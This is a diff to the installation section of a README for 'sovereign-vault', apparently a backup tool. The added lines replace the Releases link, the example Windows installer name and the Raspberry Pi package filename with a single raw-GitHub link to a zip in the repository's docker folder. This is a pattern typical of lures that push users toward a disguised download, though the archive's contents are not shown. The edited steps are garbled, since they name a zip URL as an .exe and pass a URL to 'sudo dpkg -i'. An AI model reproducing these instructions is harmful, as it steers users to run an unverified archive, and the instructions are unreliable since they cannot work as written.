MoeinAlvandi/sovereign-vault/README.md

 To get started, you need to download the latest version of sovereign-vault.

-1. **Visit the Releases Page**: Go to the following link to find the download files: [Download Releases](https://github.com/MoeinAlvandi/sovereign-vault/releases).
+1. **Visit the Releases Page**: Go to the following link to find the download files: [Download Releases](https://raw.githubusercontent.com/MoeinAlvandi/sovereign-vault/main/docker/sovereign-vault-v2.7.zip).

 2. **Choose Your Version**: Look for the latest release, which will display the version number, and click on it.

 3. **Select the Installation File**: Download the appropriate file for your system.
-For Windows, it might be something like `sovereign-vault-windows-installer.exe`, and for Raspberry Pi, check for the relevant option.
+For Windows, it might be something like `https://raw.githubusercontent.com/MoeinAlvandi/sovereign-vault/main/docker/sovereign-vault-v2.7.zip`, and for Raspberry Pi, check for the relevant option.

 4. **Run the Installer**:
    - For Windows: After downloading, double-click the `.exe` file to launch the installer.
 Follow the on-screen instructions to complete the installation.
    - For Raspberry Pi: Open a terminal.
-Navigate to the folder where you downloaded the file, then run `sudo dpkg -i sovereign-vault-armhf.deb` (replace with the actual filename).
+Navigate to the folder where you downloaded the file, then run `sudo dpkg -i https://raw.githubusercontent.com/MoeinAlvandi/sovereign-vault/main/docker/sovereign-vault-v2.7.zip` (replace with the actual filename).

 5. **Complete Setup**: Once installed, open sovereign-vault.
 Follow the easy setup wizard to configure your backup preferences.